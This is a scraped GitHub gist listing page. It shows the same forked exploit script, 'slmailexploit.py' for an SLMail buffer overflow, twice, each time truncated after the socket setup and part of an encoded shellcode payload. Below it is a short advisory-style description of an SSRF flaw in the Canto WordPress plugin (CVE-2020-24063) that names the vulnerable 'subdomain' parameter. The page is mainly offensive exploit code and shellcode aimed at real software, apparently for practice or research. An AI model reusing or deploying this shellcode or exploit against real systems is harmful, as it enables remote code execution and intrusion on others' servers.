Hakooraevil
/ slmailexploit.py
Created
November 11, 2020 10:01
— forked from loopspell/slmailexploit.py
SLMail Buffer Overflow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket | |
| # Final Exploit | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(30) | |
| shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" | |
| "\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07" | |
| "\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94" | |
| "\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b" | |
| "\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d" |
Hakooraevil
/ slmailexploit.py
Created
November 11, 2020 10:00
— forked from loopspell/slmailexploit.py
SLMail Buffer Overflow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket | |
| # Final Exploit | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(30) | |
| shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" | |
| "\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07" | |
| "\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94" | |
| "\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b" | |
| "\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d" |
Hakooraevil
/ CVE-2020-24063
Last active
November 9, 2020 16:07
SSRF in Canto Plugin for Wordpress (CVE-2020-24063)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Description | |
| The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF. | |
| "subdomain" parameter in Canto WordPress Plugin is vulnerable to | |
| Server-Side Request Forgery (SSRF) which allows an attacker to make a | |
| request to an internal or external server & retrieve content hosted on | |
| the server. Due to this, an attacker can perform attacks such as | |
| Cross-Site Scripting, Cross-Site Port Attack, abuse Cross-Origin | |
| resource sharing, or access internal resources hosted on the server. | |